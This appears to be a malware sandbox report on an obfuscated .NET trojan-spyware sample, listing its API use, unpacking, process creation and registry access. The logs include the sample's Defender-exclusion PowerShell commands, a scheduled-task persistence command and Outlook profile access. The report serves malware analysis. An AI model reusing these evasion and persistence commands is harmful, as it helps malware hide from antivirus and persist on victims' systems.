                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, UgSrknbgKc7CbTnK3T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, sdWILBNvBBU0paUJK3.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, UgSrknbgKc7CbTnK3T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2e08380.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.56a0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2e10398.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@2/2
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile created: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMutant created: \Sessions\1\BaseNamedObjects\qTyhEpmBbahPstupOEe
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE1D3.tmpJump to behavior
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: oBMlky3Rkm7h5QK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: oBMlky3Rkm7h5QK.exeReversingLabs: Detection: 68%
                    Source: oBMlky3Rkm7h5QK.exeVirustotal: Detection: 59%
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile read: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe "C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe"
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe "C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe"
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: HGCt.pdb source: oBMlky3Rkm7h5QK.exe, ECXXCuFHUVw.exe.0.dr
                    Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000009.00000002.2138116627.0000000005880000.00000004.00000020.00020000.00000000.sdmp, qZeUnR.exe, 0000000F.00000000.2223100492.0000000000692000.00000002.00000001.01000000.0000000D.sdmp, qZeUnR.exe.9.dr
                    Source: Binary string: RegSvcs.pdbKL source: RegSvcs.exe, 0000000E.00000002.3313067108.00000000064D0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2138116627.0000000005880000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3313067108.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, qZeUnR.exe, 0000000F.00000000.2223100492.0000000000692000.00000002.00000001.01000000.0000000D.sdmp, qZeUnR.exe.9.dr
                    Source: Binary string: HGCt.pdbSHA256 source: oBMlky3Rkm7h5QK.exe, ECXXCuFHUVw.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, sdWILBNvBBU0paUJK3.cs.Net Code: RagZLYBhXvQrUBlZcDV System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, sdWILBNvBBU0paUJK3.cs.Net Code: RagZLYBhXvQrUBlZcDV System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: 0xE6CCA141 [Sat Sep 13 18:51:45 2092 UTC]
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07066442 push ebx; ret 0_2_07066448
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07068270 push esp; iretd 0_2_07068271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0249EDF0 pushad ; retn 05D6h9_2_0249EE99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02490CB5 push edi; ret 9_2_02490CC2
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_0157EA60 pushad ; retf 10_2_0157EA69
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F654C push ebx; ret 10_2_077F654D
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F6442 push ebx; ret 10_2_077F6448
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 10_2_077F8270 push esp; iretd 10_2_077F8271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0163EDF0 pushad ; retn 06A9h14_2_0163EE99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01630C4B push edi; retf 14_2_01630C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01630C93 push edi; ret 14_2_01630CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06AEFEF0 push es; ret 14_2_06AEFEF4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06F203C0 push es; ret 14_2_06F203D0
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: section name: .text entropy: 7.660905612133851
                    Source: ECXXCuFHUVw.exe.0.drStatic PE information: section name: .text entropy: 7.660905612133851
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, Shm8rrVQ86ianZwLqDP.csHigh entropy of concatenated method names: 'W0nq5ND06x', 'VNaqZRltYH', 'VfiqDB7ukN', 'uyoqoMYkKD', 'XBaqnIx9C5', 'jnGqGhTwvO', 'YiqqfW0RgE', 'LEMqbraUYy', 'jnuqSPmGtD', 'qr8qJdYsCQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, WqcFFlYkd91GFNwSN9.csHigh entropy of concatenated method names: 'ToString', 'qpsHA4TxHA', 'D82H3q6Z0e', 'S4LHtuIB7j', 'h5THl4Der9', 'nuFH9OkIXR', 'Pe8Hy9GZQ4', 'elQHEiErUT', 'KXcH2R26dB', 'UefHTCfFBU'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, VgqpFeBQkCjASXBE5Q.csHigh entropy of concatenated method names: 'j92vIoxKnJ', 'Mk6vPRRLtr', 'mjcvdhvWlJ', 'eI6vp5Ch0v', 'fiqvLT651a', 'haavkyqrQo', 'pDPvNiR5SO', 'nCwv1CEXqY', 'kk0vMV4cIU', 'y5Yve3fwdy'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, h4i7XBwIpFKWLlh4dN.csHigh entropy of concatenated method names: 'ss3XB7erxi', 'YoGX45hq5p', 'ncOvQJF2bY', 'cZQvV92mk9', 'oblXA3CSS0', 'cMkXahSF70', 'JlXXmimdof', 'vuuX8m3EJg', 'gLaX7ouMJq', 'y5fXY7xwV5'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, TwI7Y4m8K7mSSD0YhV.csHigh entropy of concatenated method names: 'YJwjbtGDE9', 'vVRjSvAVnq', 'q9OjFI8xf5', 'zexj3TmULA', 'eJ7jlirI3w', 'i3uj903Rx2', 'NM3jETlQsj', 'QlPj25cFxD', 'se5jxF8Uns', 'CgwjAYEqEb'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, FIDComPUOgH5JRy9sb.csHigh entropy of concatenated method names: 'Dispose', 'iKvVRVh8l1', 'mBWC32q1wF', 'Xrn22tB2b6', 'swgV4qpFeQ', 'jCjVzASXBE', 'ProcessDialogKey', 'yQ0CQhEZhy', 'bdPCVQ7r5q', 'rcHCCpRKIM'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, GtWRNb8Z6ilZ7fdQu0.csHigh entropy of concatenated method names: 'sCbuxO6YqZ', 'zeLuadoZ43', 'Xr1u83pNaw', 'lCpu7fnkLX', 'y5Wu3uthYH', 'zgTutoXJ5A', 'O9ZulSLh1V', 'HeKu9XW1Be', 'gs9uyNY70T', 'plVuE7LUF3'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, AdIKiZTOrmiEELDc9D.csHigh entropy of concatenated method names: 'A67k5ZjMsq', 'HRlkZHtnyL', 'yAHkDVsgaw', 'FGjkoqPIVZ', 'uGNknPHve8', 'nKrkGYadj7', 'pCykf6WQ8L', 'i9Ykb4ZWDf', 'lq7kSIfc98', 'W7ikJ69BSV'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, zx9sPcFZXm1kCieFYZ.csHigh entropy of concatenated method names: 'g47Ls01fvs', 't0oLPlA9Op', 'V0wLpn5RCO', 'FX7LkJi7SZ', 'PWGLN57v3u', 's9npK5pU0A', 'qewpwxF5rY', 'gs1pckQ03l', 'NXQpBs2AmI', 'WBnpRbGP9O'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, UgSrknbgKc7CbTnK3T.csHigh entropy of concatenated method names: 'OJHP8P61tA', 'SgaP79DFfj', 'yYNPYbhXdE', 'jGLP0rL9jP', 'IASPKW9wC5', 'gdYPwrfa3I', 'aBnPcXkvB7', 'oLjPBVl5rF', 'nT6PR11Stx', 'lOnP4415f7'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, hRKIMx44gRGkpSbYg6.csHigh entropy of concatenated method names: 'UspqVq2UfJ', 'aCqq6J8vf9', 'IrkqgHEW4p', 'kpvqIcNgml', 'VUuqP5irdU', 'YPxqpbfDQV', 'W1vqLwOUGD', 'a3kvcikTGl', 'A0LvBmvV7J', 'dOuvR9Eb5W'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, Bv9tp1CX2HGWlNF5j7.csHigh entropy of concatenated method names: 'QQWD0jEl3', 'yaEon9ljb', 'gaYGh7U98', 'by2fnTTEH', 'bAeSIM6aR', 'CRkJfA5Ij', 'HlKlhAmwlYEMbmZgYH', 'hPu0APFwOvsATSLQjB', 'YBuvXbIig', 'Y06UTOi8K'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, FvbN39du4ymHr67yRt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UkfCRsWHII', 'FxNC4c0pmK', 'NcbCzWWop1', 'rcV6Qwq5FK', 'Ck76Vbm0PH', 'L1D6CrQxTQ', 'CWb66db457', 'yxZTdtBr8ppGI5p0DTj'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, oMCiUjzBPeF7qtcIEJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crQqjKy5XP', 'hhlquCSa7y', 'VGhqHL7qX9', 'MQNqXkUJjN', 'f4UqvJErH1', 'PuNqqSWOx0', 'E4pqUH5KTS'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, ThEZhyRCdPQ7r5qvcH.csHigh entropy of concatenated method names: 'YjZvFgEgMN', 'M2Ev3mdMMZ', 'worvttnUyn', 'fH5vl3OnRH', 'kUNv8tq2WS', 'wxvv9N2g0n', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, WasSmoV6KYddoY1pevK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r1SU8WS8qg', 'hibU7aeUSg', 'LaJUYV9fWu', 'tixU0WnHE7', 'UXyUK2WxqC', 'Rk6UwPlJho', 'oesUcoD4f5'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, vhekVySNHNEF6vdGNR.csHigh entropy of concatenated method names: 'mTqdomHDVI', 'DvwdGaKoP3', 'OoXdb3FbNk', 'ITadSMUEEQ', 'MywduV0rVh', 'vDldH1nCo3', 'rsddXdSRBU', 'Yv1dv7KkGT', 'MQsdqhKEnh', 'Yb7dUsBTUQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, bcouJr0nu7QPUXcCVJ.csHigh entropy of concatenated method names: 'QFDXMQ5MmB', 'w4oXe7hW4R', 'ToString', 'IqZXI4u7bI', 'vTiXP4kc8r', 'RxTXd7evs9', 'TBiXpEX7xe', 'cu8XL6k2OY', 'J7UXk9C9Sr', 'hmdXNLxVPQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, sdWILBNvBBU0paUJK3.csHigh entropy of concatenated method names: 'LQl6seIjsN', 'V8k6Icm0F5', 'r396PkUnEv', 'wGl6dhUdJZ', 'p6e6pQin4c', 'sO96Lmng4o', 'pmT6koy0Ge', 'xfH6NC9OJd', 'SUd61gU5XX', 'bfD6MEk9UM'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.41b6740.5.raw.unpack, yhro0WgmvOHNbOvbd4.csHigh entropy of concatenated method names: 'egKVkgSrkn', 'dKcVN7CbTn', 'KNHVMNEF6v', 'hGNVeRcqmA', 'jiWVuA5Zx9', 'ePcVHZXm1k', 'aVerSb46eerbTokZDe', 'o9gy7qxItucd1FhJVV', 'Q35VVqWZlA', 'eV4V6Pa2Ql'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, Shm8rrVQ86ianZwLqDP.csHigh entropy of concatenated method names: 'W0nq5ND06x', 'VNaqZRltYH', 'VfiqDB7ukN', 'uyoqoMYkKD', 'XBaqnIx9C5', 'jnGqGhTwvO', 'YiqqfW0RgE', 'LEMqbraUYy', 'jnuqSPmGtD', 'qr8qJdYsCQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, WqcFFlYkd91GFNwSN9.csHigh entropy of concatenated method names: 'ToString', 'qpsHA4TxHA', 'D82H3q6Z0e', 'S4LHtuIB7j', 'h5THl4Der9', 'nuFH9OkIXR', 'Pe8Hy9GZQ4', 'elQHEiErUT', 'KXcH2R26dB', 'UefHTCfFBU'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, VgqpFeBQkCjASXBE5Q.csHigh entropy of concatenated method names: 'j92vIoxKnJ', 'Mk6vPRRLtr', 'mjcvdhvWlJ', 'eI6vp5Ch0v', 'fiqvLT651a', 'haavkyqrQo', 'pDPvNiR5SO', 'nCwv1CEXqY', 'kk0vMV4cIU', 'y5Yve3fwdy'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, h4i7XBwIpFKWLlh4dN.csHigh entropy of concatenated method names: 'ss3XB7erxi', 'YoGX45hq5p', 'ncOvQJF2bY', 'cZQvV92mk9', 'oblXA3CSS0', 'cMkXahSF70', 'JlXXmimdof', 'vuuX8m3EJg', 'gLaX7ouMJq', 'y5fXY7xwV5'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, TwI7Y4m8K7mSSD0YhV.csHigh entropy of concatenated method names: 'YJwjbtGDE9', 'vVRjSvAVnq', 'q9OjFI8xf5', 'zexj3TmULA', 'eJ7jlirI3w', 'i3uj903Rx2', 'NM3jETlQsj', 'QlPj25cFxD', 'se5jxF8Uns', 'CgwjAYEqEb'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, FIDComPUOgH5JRy9sb.csHigh entropy of concatenated method names: 'Dispose', 'iKvVRVh8l1', 'mBWC32q1wF', 'Xrn22tB2b6', 'swgV4qpFeQ', 'jCjVzASXBE', 'ProcessDialogKey', 'yQ0CQhEZhy', 'bdPCVQ7r5q', 'rcHCCpRKIM'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, GtWRNb8Z6ilZ7fdQu0.csHigh entropy of concatenated method names: 'sCbuxO6YqZ', 'zeLuadoZ43', 'Xr1u83pNaw', 'lCpu7fnkLX', 'y5Wu3uthYH', 'zgTutoXJ5A', 'O9ZulSLh1V', 'HeKu9XW1Be', 'gs9uyNY70T', 'plVuE7LUF3'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, AdIKiZTOrmiEELDc9D.csHigh entropy of concatenated method names: 'A67k5ZjMsq', 'HRlkZHtnyL', 'yAHkDVsgaw', 'FGjkoqPIVZ', 'uGNknPHve8', 'nKrkGYadj7', 'pCykf6WQ8L', 'i9Ykb4ZWDf', 'lq7kSIfc98', 'W7ikJ69BSV'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, zx9sPcFZXm1kCieFYZ.csHigh entropy of concatenated method names: 'g47Ls01fvs', 't0oLPlA9Op', 'V0wLpn5RCO', 'FX7LkJi7SZ', 'PWGLN57v3u', 's9npK5pU0A', 'qewpwxF5rY', 'gs1pckQ03l', 'NXQpBs2AmI', 'WBnpRbGP9O'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, UgSrknbgKc7CbTnK3T.csHigh entropy of concatenated method names: 'OJHP8P61tA', 'SgaP79DFfj', 'yYNPYbhXdE', 'jGLP0rL9jP', 'IASPKW9wC5', 'gdYPwrfa3I', 'aBnPcXkvB7', 'oLjPBVl5rF', 'nT6PR11Stx', 'lOnP4415f7'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, hRKIMx44gRGkpSbYg6.csHigh entropy of concatenated method names: 'UspqVq2UfJ', 'aCqq6J8vf9', 'IrkqgHEW4p', 'kpvqIcNgml', 'VUuqP5irdU', 'YPxqpbfDQV', 'W1vqLwOUGD', 'a3kvcikTGl', 'A0LvBmvV7J', 'dOuvR9Eb5W'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, Bv9tp1CX2HGWlNF5j7.csHigh entropy of concatenated method names: 'QQWD0jEl3', 'yaEon9ljb', 'gaYGh7U98', 'by2fnTTEH', 'bAeSIM6aR', 'CRkJfA5Ij', 'HlKlhAmwlYEMbmZgYH', 'hPu0APFwOvsATSLQjB', 'YBuvXbIig', 'Y06UTOi8K'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, FvbN39du4ymHr67yRt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UkfCRsWHII', 'FxNC4c0pmK', 'NcbCzWWop1', 'rcV6Qwq5FK', 'Ck76Vbm0PH', 'L1D6CrQxTQ', 'CWb66db457', 'yxZTdtBr8ppGI5p0DTj'
